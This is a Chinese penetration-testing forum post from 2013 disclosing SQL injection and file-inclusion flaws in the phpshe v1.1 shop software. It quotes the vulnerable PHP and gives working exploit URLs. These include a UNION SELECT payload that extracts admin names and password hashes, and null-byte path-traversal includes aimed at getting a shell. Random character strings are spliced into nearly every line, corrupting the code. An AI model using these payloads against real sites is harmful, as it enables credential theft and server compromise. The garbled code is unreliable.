找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 phpshe v1.1多处SQL注入和文件包含漏洞Getshell
返回列表 发新帖
查看: 2893|回复: 0
打印 上一主题 下一主题

phpshe v1.1多处SQL注入和文件包含漏洞Getshell

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2013-4-19 19:01:54 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
/*******************************************************/
9 j! d# E5 u8 C7 j! K4 X4 I/* Phpshe v1.1 Vulnerability
0 L  f7 m" G- {) M# T  A" G0 h/* ========================
$ k" A& D7 ^- B& y: ]( N, G9 O+ ~/* By: : Kn1f3% m4 P5 B; c/ v/ W5 h
/* E-Mail : 681796@qq.com- J' a4 G  t+ W' f/ w
/*******************************************************/
3 ^7 e- \, S0 [1 t/ p0×00 整体大概参数传输1 A+ Y4 C8 ?& u$ F. B

; s6 e, T% J7 {. {7 v: q
* A- {) [: G$ `; |8 H" v3 o5 H1 [" ^
//common.php
, }) w1 [& ]) y7 b4 ?if (get_magic_quotes_gpc()) {2 ~; A* c- M* s, e: {: e1 p
!empty($_GET) && extract(pe_trim(pe_stripslashes($_GET)), EXTR_PREFIX_ALL, '_g');
/ K, \0 c9 g. f  s5 B0 y!empty($_POST) && extract(pe_trim(pe_stripslashes($_POST)), EXTR_PREFIX_ALL, '_p');3 A. X  ]# O/ a5 e6 F
}2 [- j% Q- R3 Y( T& d8 e& j7 r5 ^+ N
else {1 ^5 l5 d& |: I) n( }( c7 r/ ^; g9 q
!empty($_GET) && extract(pe_trim($_GET),EXTR_PREFIX_ALL,'_g');
: J6 C2 k+ H: H& i& T!empty($_POST) && extract(pe_trim($_POST),EXTR_PREFIX_ALL,'_p');4 ^. b$ H5 d! `% K& y
}- E/ q7 [, g" s: W2 g
session_start();
/ e( e$ e/ q. m5 w: N!empty($_SESSION) && extract(pe_trim($_SESSION),EXTR_PREFIX_ALL,'_s');
; R& c4 [" q# _; `# f# A9 W: }. _!empty($_COOKIE) && extract(pe_trim(pe_stripslashes($_COOKIE)),EXTR_PREFIX_ALL,'_c');
& Z/ C: C. ~  J& V2 d
( z9 g0 ^6 k2 h) u9 P: A7 F0×01 包含漏洞
# H% P7 g% {. C3 V  n  S ( h. d' L8 O3 M1 g5 D) _
8 u8 ]& K, m2 K" G
//首页文件5 U# o, J: |: N, ~$ [
<!--?php include('common.php'); $cache_category = cache::get('category'); $cache_category_arr = cache::get('category_arr'); $cache_class = cache::get('class'); $cache_ad = cache::get('ad'); $cache_link = cache::get('link'); $cache_page = cache::get('page'); $web_qq = $cache_setting['web_qq']['setting_value'] ? explode(',', $cache_setting['web_qq']['setting_value']) : array(); $cart_num = pe_login('user') ? $db--->pe_num('cart', array('user_id'=>$_s_user_id)) : (unserialize($_c_cart_list) ? count(unserialize($_c_cart_list)) : 0);
9 u8 C% r. s: u2 D, F+ ainclude("{$pe['path_root']}module/{$module}/{$mod}.php");  //$mod可控造成“鸡肋”包含漏洞$ v1 K8 a7 [1 u% `! l: _( r! |4 d
pe_result();
- F1 x# k1 K/ P" k& |?>" d; c  o& o+ @# |/ Z9 `8 M
//common 文件 第15行开始6 J# K% A  i- y- |5 n
url路由配置
, G. y! z) _5 Q4 S$module = $mod = $act = 'index';
5 ]9 u; u; t* o! `; u/ F: k: {$mod = $_POST['mod'] ? $_POST['mod'] : ($_GET['mod'] ? $_GET['mod'] : $mod);
1 J$ Z( d) ]' u; J7 `5 G$act = $_POST['act'] ? $_POST['act'] : ($_GET['act'] ? $_GET['act'] : $act);
) o' v# w9 v. \& h# V2 h$id = $_POST['id'] ? $_POST['id'] : ($_GET['id'] ? $_GET['id'] : $id);
" R, l, o. N- J/ _//exp:http://127.0.0.1/phpshe_v1.1/index.php?mod=../../robots.txt%00
  b) V1 h$ _* y; \( ^7 l


, f7 }: D2 g' @ ! P3 ?2 o* C9 J/ T
0×02 搜索注入4 W6 }% A1 U. [& R$ ]1 V6 i: ^
7 r/ ^3 M2 s/ ?" l+ p9 A! S3 S
<code id="code2">

//product.php文件6 @+ I/ p, s$ T, S4 J
case 'list':8 {, f. Z& c+ B% Y3 a
$category_id = intval($id);
, l- O1 `2 x% a$info = $db->pe_select('category', array('category_id'=>$category_id));
7 w- V. J$ L/ I( q0 r: b//搜索
' P0 ~4 n$ x5 w* P& H- s$ Y& H$sqlwhere = " and `product_state` = 1";
. B+ x$ Q) c1 u0 f1 A# bpe_lead('hook/category.hook.php');4 B5 S/ K1 V# y3 X8 p& o0 x. c
if ($category_id) {( I) a, Y+ i" h6 Y0 Q
where .= is_array($category_cidarr = category_cidarr($category_id)) ? " and `category_id` in('".implode("','", $category_cidarr)."')" : " and `category_id` = '{$category_id}'";
' L8 d* H( [/ W# Q) I" {  \7 Y" Q. h}
. P9 Q+ ]7 ], m3 K2 {$_g_keyword && $sqlwhere .= " and `product_name` like '%{$_g_keyword}%'"; //keyword变量未进行有效的sql语句过滤
0 `  ~* p1 P  d/ {$ X: vif ($_g_orderby) {% R- ^: L$ b8 g0 P$ M4 v4 T
$orderby = explode('_', $_g_orderby);  s* d. L) I. ~  T- s% j
$sqlwhere .= " order by `product_{$orderby[0]}` {$orderby[1]}";: n' @% b$ G: ?
}
6 i9 ~! @, q; L/ Eelse {# s+ O0 [: P6 z; e8 T* v
$sqlwhere .= " order by `product_id` desc";
7 t3 @% {+ T1 I/ M8 d5 n}
$ y/ M+ S9 H5 i: c+ p2 Q$info_list = $db->pe_selectall('product', $sqlwhere, '*', array(16, $_g_page));9 T. V" \) y" h% s' A5 O$ m
//热卖排行' ^; j3 r' m1 ^# r  S# p
$product_hotlist = product_hotlist();
% O8 n- y  j# e//当前路径+ k/ ^3 h& b0 f3 \
$nowpath = category_path($category_id);
; e% g# {. P; X$ ~# ]! K& k5 o$seo = pe_seo($info['category_name']);1 E3 q5 p5 t% u. [7 z
include(pe_tpl('product_list.html'));
. U1 f( p' j) _& D- N; N//跟进selectall函数库
' S9 u- v6 `# k9 \, \: y. _public function pe_selectall($table, $where = '', $field = '*', $limit_page = array())  @+ p/ V8 W5 C# @2 i/ j
{
- [+ W* P2 w- Y& P//处理条件语句9 J. F6 u) M' }8 S  Z6 W6 K" g9 A
$sqlwhere = $this->_dowhere($where);9 D  n3 x# s( c. u. ^9 N
return $this->sql_selectall("select {$field} from `".dbpre."{$table}` {$sqlwhere}", $limit_page);
: C" @2 R+ ]0 E& s}1 A) Z, Q: F! M$ D
//exp, D. G+ ]% s- R1 I) \9 I
product/list?keyword=kn1f3'+union+select+1,2,3,4,5,(select+concat(admin_name,0x27,admin_pw,0x27)+from+pe_admin),7,8,9,10,11,12,13,14,15,16,17,18,19 and+'1'='1
- m6 [7 r  a3 ~' i$ i

</code>: |; f( \) b9 V2 n

7 p: a1 C# \& o0×03 包含漏洞2
" ?% z' T3 f% G+ J 0 t- v6 ]8 n; L- N& T4 Q
<code id="code3">

//order.php

case 'pay':


/ O9 w' A: Q8 F8 F+ [4 v$order_id = pe_dbhold($_g_id);


: w3 {; z- ]$ b! n1 Y0 O$cache_payway = cache::get('payway');

7 `7 H) b7 k5 ^
foreach($cache_payway as $k => $v) {

/ i# i  ~6 m# `$ }' O5 c9 k$ ?
$cache_payway[$k]['payway_config'] = unserialize($cache_payway[$k]['payway_config']);

4 U0 T2 d! ]1 ?, R4 i$ p* ~
if ($k == 'bank') {


" v/ V- A! \) o. I" n$cache_payway[$k]['payway_config']['bank_text'] = str_replace(array("\r", "\n", "\t"), '\n', $cache_payway[$k]['payway_config']['bank_text']);

- o. K. g" T4 x. q3 w
}

, }0 Q9 R+ m9 }7 x% |
}


% R! V) }, Q  r: V9 x$ O9 H& }9 m$order = $db->pe_select('order', array('order_id'=>$order_id, 'order_state'=>'notpay'));

& I* {1 Z9 c1 M2 [- f% O
!$order['order_id'] && pe_error('订单号错误...');

" v* e! i$ {) ^) l5 W4 B
if (isset($_p_pesubmit)) {


, i8 u" O! h, jif ($db->pe_update('order', array('order_id'=>$order_id), $_p_info)) {

( r. j" Z8 |( |2 A4 @/ t% W
$info_list = $db->pe_selectall('orderdata', array('order_id'=>$order_id));

/ {% |+ {# o* U  F- y% J$ S
foreach ($info_list as $v) {

$ w: u0 w5 Q- ?  r
$order['order_name'] .= "{$v['product_name']};";
: }" w( Q+ Y6 a$ l- }

% Y$ C2 j  Y: _. u+ B+ O
}

5 ^; g4 p9 `+ j7 V5 g# v" ?/ O
echo '正在为您连接支付网站,请稍后...';

% {  c" N; {" M" R( _8 e
include("{$pe['path_root']}include/plugin/payway/{$_p_info['order_payway']}/order_pay.php");


; P! D, P! {. r}//当一切准备好的时候就可以进行"鸡肋包含了"


  f) E! M3 @) [) K  Eelse {

8 i6 ]0 `. y3 H! U$ g9 W8 K
pe_error('支付错误...');

+ H* K% l$ o" I$ E" n
}


8 r3 R+ p. p" x1 `}


% a; z2 R) m5 |+ Q7 h$seo = pe_seo('选择支付方式');

4 L0 v/ k" `$ H8 [5 X6 F
include(pe_tpl('order_pay.html'));


: k4 `5 T. s4 Z: J8 ?+ Abreak;

}

//exp:

//http://127.0.0.1/phpshe_v1.1/index.php?mod=order&act=pay&id=1304070001

//info%5Border_payway%5D=alipay/../../../1.txt%00&pesubmit=%E7%AB%8B%E5%8D%B3%E6%94%AF%E4%BB%98</code>$ e# x) S  m# b) s

回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表